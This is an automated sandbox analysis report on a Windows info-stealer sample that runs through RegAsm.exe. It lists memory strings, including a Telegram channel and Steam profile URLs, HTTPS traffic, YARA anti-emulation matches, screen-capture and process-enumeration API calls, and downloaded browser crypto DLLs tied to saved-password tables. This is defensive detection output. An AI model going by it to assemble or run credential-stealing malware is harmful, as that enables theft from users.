Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://store.steampowered.com/stats/
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: RegAsm.exe, 00000001.00000002.2111306678.000000000121A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mic.BF
Source: RegAsm.exe, 00000001.00000002.2111306678.000000000121A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.c
Source: RegAsm.exe, 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmp, GIJDAFBK.1.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: GIJDAFBK.1.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: RegAsm.exe, 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
Source: RegAsm.exe, 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmp, GIJDAFBK.1.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: GIJDAFBK.1.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: RegAsm.exe, 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17e
Source: RegAsm.exe, 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
Source: file.exe, file.exe, 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/r1g1o
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: BGCBGCAF.1.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: BGCBGCAF.1.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49672
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

Source: unknown	HTTPS traffic detected: 23.210.138.105:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.217.242.142:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.6.204.109:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.6.204.109:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.4:49777 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 1_2_0040FD7F _EH_prolog,memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

1_2_0040FD7F

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.file.exe.a2b000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 0.2.file.exe.a2b000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 0.2.file.exe.a00000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A47070	0_2_00A47070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A16294	0_2_00A16294
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A454AB	0_2_00A454AB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A19996	0_2_00A19996
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A44A09	0_2_00A44A09
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A45B87	0_2_00A45B87
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A44F5A	0_2_00A44F5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0041A609	1_2_0041A609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0041B787	1_2_0041B787
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0041AB5A	1_2_0041AB5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0041CC70	1_2_0041CC70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19834CF0	1_2_19834CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_198D5940	1_2_198D5940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19821C9E	1_2_19821C9E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19822018	1_2_19822018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19949A20	1_2_19949A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19989CC0	1_2_19989CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1982292D	1_2_1982292D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_198212A8	1_2_198212A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19822AA9	1_2_19822AA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19839000	1_2_19839000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19945040	1_2_19945040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19823580	1_2_19823580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_198B53B0	1_2_198B53B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_199FD209	1_2_199FD209
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19989430	1_2_19989430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_198C9690	1_2_198C9690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_198DD6D0	1_2_198DD6D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19821EF1	1_2_19821EF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19924A60	1_2_19924A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19848D2A	1_2_19848D2A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_198A8120	1_2_198A8120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_198A0090	1_2_198A0090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19948030	1_2_19948030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19823AB2	1_2_19823AB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19960480	1_2_19960480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19848763	1_2_19848763
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19884760	1_2_19884760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_198B8760	1_2_198B8760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19848680	1_2_19848680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1982251D	1_2_1982251D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1984BAB0	1_2_1984BAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1982290A	1_2_1982290A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1982174E	1_2_1982174E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19853370	1_2_19853370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_199069C0	1_2_199069C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1993A900	1_2_1993A900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1991A940	1_2_1991A940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1982481D	1_2_1982481D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1995E800	1_2_1995E800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19823E3B	1_2_19823E3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1982EA80	1_2_1982EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1982AA40	1_2_1982AA40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_198219DD	1_2_198219DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19866E80	1_2_19866E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_199FAEBE	1_2_199FAEBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19882EE0	1_2_19882EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1982209F	1_2_1982209F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_198AA0B0	1_2_198AA0B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1991A590	1_2_1991A590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1984A560	1_2_1984A560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_198247AF	1_2_198247AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_198366C0	1_2_198366C0

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00A07080 appears 51 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00A40EF2 appears 98 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 19821F5A appears 31 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00416AF2 appears 98 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 19A006B1 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 19823AF3 appears 37 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 1982395E appears 78 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0040249B appears 311 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 1982415B appears 125 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 19821C2B appears 47 times

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.file.exe.a2b000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 0.2.file.exe.a2b000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 0.2.file.exe.a00000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks

Source: file.exe

Static PE information: Section: .Shine ZLIB complexity 0.9969358766233766

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@30/23@5/7

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 1_2_0040FC40 _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

1_2_0040FC40

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 1_2_0040F1A8 CoCreateInstance,SysAllocString,SysFreeString,_wtoi64,SysFreeString,SysFreeString,

1_2_0040F1A8

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199680449169[1].htm

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9036:120:WilError_03

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: RegAsm.exe, 00000001.00000002.2111941345.0000000013AC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sqlx[1].dll.1.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: RegAsm.exe, 00000001.00000002.2111941345.0000000013AC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sqlx[1].dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: RegAsm.exe, RegAsm.exe, 00000001.00000002.2111941345.0000000013AC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sqlx[1].dll.1.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: RegAsm.exe, 00000001.00000002.2111941345.0000000013AC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sqlx[1].dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: RegAsm.exe, RegAsm.exe, 00000001.00000002.2111941345.0000000013AC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmp, sqlx[1].dll.1.dr	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: RegAsm.exe, 00000001.00000002.2111941345.0000000013AC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmp, sqlx[1].dll.1.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: RegAsm.exe, 00000001.00000002.2111941345.0000000013AC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sqlx[1].dll.1.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 00000001.00000002.2111941345.0000000013AC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sqlx[1].dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: RegAsm.exe, 00000001.00000002.2111941345.0000000013AC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmp, sqlx[1].dll.1.dr	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: BGHJJDGHCBGDHIECBGID.1.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: RegAsm.exe, RegAsm.exe, 00000001.00000002.2111941345.0000000013AC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmp, sqlx[1].dll.1.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: RegAsm.exe, 00000001.00000002.2111941345.0000000013AC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmp, sqlx[1].dll.1.dr	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

ReversingLabs: Detection: 31%

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
